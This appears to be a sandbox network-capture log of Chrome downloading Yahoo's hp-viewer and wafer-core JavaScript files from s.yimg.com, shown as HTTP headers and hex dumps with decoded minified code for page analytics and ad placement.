                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cache-control: no-store, no-cache, private, max-age=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              p3p: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              expires: -1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              72192.168.2.45109187.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC373OUTGET /cx/hp-viewer/desktop_1.11.185.modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC691INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: aXk30dKZP7QVuNDXha2QKkXadGGVYDXgJ9nKan/xipZSJ8anJimbcJc1M++Ir+DOcjQusToK0Es=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: C5WDZSP9RDV3JSB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 05:46:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 05 Sep 2024 14:01:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "bd4d30bf2431199179fa9afbdb1ccb76"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 65865
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 48405
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 5b 22 66 69 6e 61 6e 63 65 2e 79 61 68 6f 6f 2e 63 6f 6d 22 2c 22 6e 65 77 73 2e 79 61 68 6f 6f 2e 63 6f 6d 22 2c 22 73 70 6f 72 74 73 2e 79 61 68 6f 6f 2e 63 6f 6d 22 5d 2c 74 3d 6e 65 77 20 52 65 67 45 78 70 28 2f 72 73 3d 22 28 5b 5e 22 5d 2a 29 22 2f 29 2c 69 3d 7b 6c 6d 73 69 64 3a 22 6c 6d 73 69 64 22 2c 6c 70 73 74 61 69 64 3a 22 6c 70 73 74 61 69 64 22 2c 6c 75 3a 22 6c 75 22 2c 70 63 74 3a 22 70 61 67 65 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 70 64 3a 22 70 61 67 65 44 65 73 69 67 6e 22 2c 70 6c 3a 22 70 6c 22 2c 70 74 3a 22 70 61 67 65 54 79 70 65 22 2c 72 65 76 73 70 3a 22 72 65 76 73 70 22 2c 76 65 72 3a 22 61 70 70 4e 61 6d 65 22 7d 2c 73 3d 5b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(){"use strict";const e=["finance.yahoo.com","news.yahoo.com","sports.yahoo.com"],t=new RegExp(/rs="([^"]*)"/),i={lmsid:"lmsid",lpstaid:"lpstaid",lu:"lu",pct:"pageContentType",pd:"pageDesign",pl:"pl",pt:"pageType",revsp:"revsp",ver:"appName"},s=[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 61 61 73 2c 64 69 76 2e 77 61 66 65 72 2d 63 61 61 73 2d 63 6f 6d 70 6c 65 74 65 22 29 3b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 69 29 2e 66 69 6e 64 49 6e 64 65 78 28 28 74 3d 3e 74 3d 3d 3d 65 29 29 2b 31 7d 2c 75 3d 28 29 3d 3e 77 69 6e 64 6f 77 2e 76 7a 6d 3f 2e 67 65 74 50 61 67 65 43 6f 6e 74 65 78 74 3f 2e 28 29 7c 7c 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 3f 2e 63 6f 6e 74 65 78 74 2c 66 3d 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 75 28 29 3b 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 65 3f 2e 62 75 63 6b 65 74 7c 7c 65 3f 2e 62 75 63 6b 65 74 49 64 7c 7c 22 22 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 63 6f 6e 73 74 20 74 3d 5b 5d 3b 66 6f 72 28 63 6f 6e 73 74 20 69 20 69 6e 20 65 29 69 66 28 65 2e 68 61 73 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: aas,div.wafer-caas-complete");return Array.from(i).findIndex((t=>t===e))+1},u=()=>window.vzm?.getPageContext?.()||window.YAHOO?.context,f=()=>{const e=u();return String(e?.bucket||e?.bucketId||"")};function g(e){const t=[];for(const i in e)if(e.hasOwnProp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 28 65 2c 74 29 3d 3e 7b 69 66 28 77 69 6e 64 6f 77 2e 62 65 6e 6a 69 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 62 65 6e 6a 69 2e 75 70 64 61 74 65 49 31 33 4e 29 7b 63 6f 6e 73 74 7b 61 64 4d 65 74 61 3a 69 2c 73 70 61 63 65 49 64 3a 73 2c 68 6f 6d 65 70 61 67 65 55 72 6c 3a 6e 2c 70 72 65 73 65 6e 74 61 74 69 6f 6e 3a 61 7d 3d 65 2e 6d 65 74 61 2e 64 61 74 61 2c 72 3d 7b 7d 2c 63 3d 22 66 72 6f 6e 74 70 61 67 65 22 3d 3d 3d 74 7c 7c 22 66 70 22 3d 3d 3d 74 3b 72 2e 73 70 61 63 65 69 64 3d 69 2e 73 70 61 63 65 69 64 7c 7c 73 7c 7c 22 22 2c 69 2e 68 61 73 68 74 61 67 26 26 28 72 2e 68 61 73 68 74 61 67 3d 69 2e 68 61 73 68 74 61 67 2e 73 70 6c 69 74 28 22 3b 22 29 29 2c 63 26 26 69 2e 73 69 74 65 26 26 28 72 2e 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (e,t)=>{if(window.benji&&"function"==typeof window.benji.updateI13N){const{adMeta:i,spaceId:s,homepageUrl:n,presentation:a}=e.meta.data,r={},c="frontpage"===t||"fp"===t;r.spaceid=i.spaceid||s||"",i.hashtag&&(r.hashtag=i.hashtag.split(";")),c&&i.site&&(r.s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 69 65 77 65 72 57 69 6c 6c 4f 70 65 6e 3a 78 2c 6f 6e 56 69 65 77 65 72 4f 70 65 6e 65 64 3a 52 2c 6f 6e 56 69 65 77 65 72 43 6c 6f 73 65 64 3a 54 2c 6f 6e 56 69 65 77 65 72 44 69 64 43 6c 6f 73 65 3a 44 7d 3b 63 6f 6e 73 74 20 42 3d 22 41 55 54 4f 22 2c 46 3d 5b 22 49 4e 41 52 54 49 43 4c 45 22 2c 22 49 4e 41 52 54 49 43 4c 45 2d 31 22 2c 22 57 49 44 47 45 54 22 2c 22 57 49 44 47 45 54 2d 31 22 2c 22 57 49 44 47 45 54 41 22 5d 2c 5f 3d 5b 22 63 61 61 73 2d 69 6d 61 67 65 2d 6c 69 67 68 74 62 6f 78 22 5d 2c 24 3d 7b 61 74 74 3a 22 73 62 63 22 2c 66 72 6f 6e 74 69 65 72 3a 22 66 74 72 22 2c 72 6f 67 65 72 73 3a 22 72 6f 67 65 72 73 2d 61 63 73 22 7d 2c 48 3d 5b 22 57 49 44 47 45 54 41 22 5d 3b 63 6f 6e 73 74 20 57 3d 7b 61 72 74 69 63 6c 65 3a 22 73 74 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: iewerWillOpen:x,onViewerOpened:R,onViewerClosed:T,onViewerDidClose:D};const B="AUTO",F=["INARTICLE","INARTICLE-1","WIDGET","WIDGET-1","WIDGETA"],_=["caas-image-lightbox"],$={att:"sbc",frontier:"ftr",rogers:"rogers-acs"},H=["WIDGETA"];const W={article:"sto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 73 2e 73 70 61 63 65 69 64 3d 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 3f 2e 67 65 74 52 61 70 69 64 41 74 74 72 69 62 75 74 65 28 22 73 70 61 63 65 69 64 22 29 2c 74 68 69 73 2e 6d 61 69 6e 41 72 74 69 63 6c 65 52 61 70 69 64 43 6f 6e 66 69 67 3d 69 2c 74 68 69 73 2e 63 6c 75 73 74 65 72 41 72 74 69 63 6c 65 52 61 70 69 64 43 6f 6e 66 69 67 3d 73 7d 6f 6e 56 69 65 77 65 72 57 69 6c 6c 4f 70 65 6e 28 29 7b 74 68 69 73 2e 68 6f 6d 65 55 72 6c 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 74 68 69 73 2e 76 69 65 77 65 64 41 72 74 69 63 6c 65 73 2e 63 6c 65 61 72 28 29 7d 6f 6e 43 6c 69 63 6b 28 65 29 7b 22 73 6c 69 64 65 73 68 6f 77 22 3d 3d 3d 65 2e 74 79 70 65 3f 74 68 69 73 2e 6f 6e 53 6c 69 64 65 73 68 6f 77 43 6c 69 63 6b 28 65 29 3a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s.spaceid=window.rapidInstance?.getRapidAttribute("spaceid"),this.mainArticleRapidConfig=i,this.clusterArticleRapidConfig=s}onViewerWillOpen(){this.homeUrl=location.href,this.viewedArticles.clear()}onClick(e){"slideshow"===e.type?this.onSlideshowClick(e):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 26 26 28 74 68 69 73 2e 72 65 66 65 72 65 72 55 72 6c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 74 68 69 73 2e 76 69 65 77 65 64 41 72 74 69 63 6c 65 73 2e 61 64 64 28 65 2e 65 6c 65 6d 2e 69 64 29 7d 75 70 64 61 74 65 52 61 70 69 64 41 74 74 72 69 62 75 74 65 73 28 65 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 7b 65 6c 65 6d 3a 74 2c 6d 65 74 61 3a 7b 64 61 74 61 3a 69 7d 7d 3d 65 2c 7b 61 64 4d 65 74 61 3a 73 2c 63 61 6e 6f 6e 69 63 61 6c 55 72 6c 3a 6e 2c 63 6f 6e 74 65 6e 74 54 79 70 65 3a 6f 2c 68 61 73 53 63 72 69 62 62 6c 65 3a 61 3d 21 31 2c 68 61 73 59 61 68 6f 6f 56 69 64 65 6f 3a 72 2c 68 69 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: dow.location.href&&(this.refererUrl=window.location.href),this.viewedArticles.add(e.elem.id)}updateRapidAttributes(e){if(!window.rapidInstance)return;const{elem:t,meta:{data:i}}=e,{adMeta:s,canonicalUrl:n,contentType:o,hasScribble:a=!1,hasYahooVideo:r,hid
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 3f 2e 73 65 74 52 61 70 69 64 41 74 74 72 69 62 75 74 65 28 7b 6b 65 79 73 3a 6b 2c 73 70 61 63 65 69 64 3a 76 7d 29 2c 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 26 26 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 2e 69 31 33 6e 26 26 28 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 2e 69 31 33 6e 2e 53 50 41 43 45 49 44 3d 70 61 72 73 65 49 6e 74 28 76 2c 31 30 29 29 7d 62 65 61 63 6f 6e 4d 6f 64 61 6c 43 6f 6e 74 65 6e 74 28 65 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 7b 65 6c 65 6d 3a 7b 69 64 3a 74 7d 7d 3d 65 3b 74 68 69 73 2e 75 70 64 61 74 65 52 61 70 69 64 41 74 74 72 69 62 75 74 65 73 28 65 29 2c 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: indow.rapidInstance?.setRapidAttribute({keys:k,spaceid:v}),window.YAHOO&&window.YAHOO.i13n&&(window.YAHOO.i13n.SPACEID=parseInt(v,10))}beaconModalContent(e){if(!window.rapidInstance)return;const{elem:{id:t}}=e;this.updateRapidAttributes(e),window.rapidIns
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 6e 74 3d 22 68 6f 6d 65 70 61 67 65 2d 76 69 65 77 65 72 22 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 45 76 65 6e 74 3d 22 68 6f 6d 65 70 61 67 65 2d 76 69 65 77 65 72 2d 76 69 65 77 70 6f 72 74 22 2c 74 68 69 73 2e 6f 6e 53 63 72 6f 6c 6c 48 61 6e 64 6c 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 41 64 50 6f 73 69 74 69 6f 6e 73 3d 5b 5d 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 41 64 46 65 74 63 68 53 6c 6f 74 49 6e 64 65 78 3d 5b 5d 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 50 72 65 76 69 6f 75 73 41 64 46 65 74 63 68 53 6c 6f 74 49 6e 64 65 78 3d 5b 5d 2c 74 68 69 73 2e 70 61 67 65 43 6f 6e 74 65 78 74 3d 7b 7d 2c 74 68 69 73 2e 76 69 65 77 65 72 41 64 73 43 6f 6e 66 69 67 3d 7b 7d 2c 74 68 69 73 2e 62 65 6e 6a 69 41 64 49 64 41 72 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nt="homepage-viewer",this.viewportEvent="homepage-viewer-viewport",this.onScrollHandle=null,this.viewportAdPositions=[],this.viewportAdFetchSlotIndex=[],this.viewportPreviousAdFetchSlotIndex=[],this.pageContext={},this.viewerAdsConfig={},this.benjiAdIdArr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 74 68 69 73 2e 6f 6e 50 72 65 50 61 72 73 65 41 64 73 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 73 2e 6f 6e 28 22 63 61 61 73 3a 61 72 74 69 63 6c 65 3a 70 72 65 3a 69 6e 76 69 65 77 22 2c 74 68 69 73 2e 73 65 74 57 61 66 65 72 53 74 61 74 65 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 73 2e 6f 6e 28 22 63 61 61 73 3a 61 72 74 69 63 6c 65 3a 70 72 65 3a 69 6e 76 69 65 77 22 2c 74 68 69 73 2e 75 70 64 61 74 65 57 61 66 65 72 53 74 61 74 65 49 6e 56 69 65 77 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 73 2e 6f 6e 28 22 63 61 61 73 3a 61 72 74 69 63 6c 65 3a 69 6e 76 69 65 77 22 2c 74 68 69 73 2e 6f 6e 41 72 74 69 63 6c 65 49 6e 76 69 65 77 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 69 3f 2e 6f 6e 28 22 52 45 4e 44 45 52 5f 53 55 43 43 45 45 44 45 44 22 2c 74 68 69 73 2e 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: this.onPreParseAds.bind(this)),s.on("caas:article:pre:inview",this.setWaferState.bind(this)),s.on("caas:article:pre:inview",this.updateWaferStateInView.bind(this)),s.on("caas:article:inview",this.onArticleInview.bind(this)),i?.on("RENDER_SUCCEEDED",this.o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1300INData Raw: 6f 73 69 74 69 6f 6e 4d 65 74 61 2e 70 6f 73 69 74 69 6f 6e 73 29 7b 63 6f 6e 73 74 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 2e 63 6c 65 61 6e 29 2c 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 2e 64 65 73 74 29 2c 6f 3d 2d 31 21 3d 3d 48 2e 69 6e 64 65 78 4f 66 28 74 2e 69 64 29 3b 69 66 28 6f 26 26 73 29 7b 63 6f 6e 73 74 20 65 3d 73 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 3b 69 66 28 65 26 26 65 2e 69 64 2e 65 6e 64 73 57 69 74 68 28 22 2d 62 61 73 65 22 29 29 63 6f 6e 74 69 6e 75 65 7d 69 66 28 73 26 26 73 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 6e 29 7b 6f 7c 7c 28 74 2e 69 64 3d 22 55 42 41 22 2b 74 2e 69 64 2c 74 2e 63 6c 65 61 6e 3d 74 3f 2e 63 6c 65 61 6e 3f 2e 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ositionMeta.positions){const s=document.getElementById(t.clean),n=document.getElementById(t.dest),o=-1!==H.indexOf(t.id);if(o&&s){const e=s.parentElement;if(e&&e.id.endsWith("-base"))continue}if(s&&s.parentNode&&n){o||(t.id="UBA"+t.id,t.clean=t?.clean?.re


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              73192.168.2.45109387.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC365OUTGET /aaq/wf/wf-core-1.65.1-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 2uhfkYjOyCQiRAjmgjHsSa1gohs6q54Hz3Id4f7ZK0vW2z400GfTU6UY5leGW+wv6kDJvrqg1Dc=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: NA1NBY1N2HQ6NHAA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Wed, 02 Oct 2024 13:15:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 18 Apr 2024 01:03:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "c1fbb54c4f22838f40ce99e7418fcd97"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: VaxAIobZ0y0iWnHdR00i8Xnb9e_2JypL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 60378
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 539880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 77 61 66 65 72 3d 74 28 29 3a 65 2e 77 61 66 65 72 3d 74 28 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer",[],t):"object"==typeof exports?exports.wafer=t():e.wafer=t()}("undefined"!=typeof self?self:this,function(){return fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 2c 6e 3d 41 72 72 61 79 28 65 2e 6c 65 6e 67 74 68 29 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 6e 5b 74 5d 3d 65 5b 74 5d 3b 72 65 74 75 72 6e 20 6e 7d 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 3f 65 3a 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: le:!0,writable:!0}):e[t]=n,e}function c(e){if(Array.isArray(e)){for(var t=0,n=Array(e.length);t<e.length;t++)n[t]=e[t];return n}return Array.from(e)}function u(e){return Array.isArray(e)?e:Array.from(e)}function l(e,t){if(!(e instanceof t))throw new TypeE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:37 UTC1300INData Raw: 20 45 7d 29 2c 6e 2e 64 28 6d 2c 22 70 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 53 75 70 70 6f 72 74 65 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 29 2c 6e 2e 64 28 6d 2c 22 69 73 54 6f 75 63 68 53 61 66 61 72 69 44 65 76 69 63 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 7d 29 2c 6e 2e 64 28 6d 2c 22 73 6d 6f 6f 74 68 53 63 72 6f 6c 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 29 2c 6e 2e 64 28 6d 2c 22 69 73 50 57 41 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 7d 29 3b 76 61 72 20 79 3d 7b 7d 3b 6e 2e 64 28 79 2c 22 69 73 56 69 73 69 62 6c 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 47 7d 29 2c 6e 2e 64 28 79 2c 22 64 65 62 6f 75 6e 63 65 22 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: E}),n.d(m,"performanceMarkSupported",function(){return T}),n.d(m,"isTouchSafariDevice",function(){return k}),n.d(m,"smoothScroll",function(){return C}),n.d(m,"isPWA",function(){return S});var y={};n.d(y,"isVisible",function(){return G}),n.d(y,"debounce",
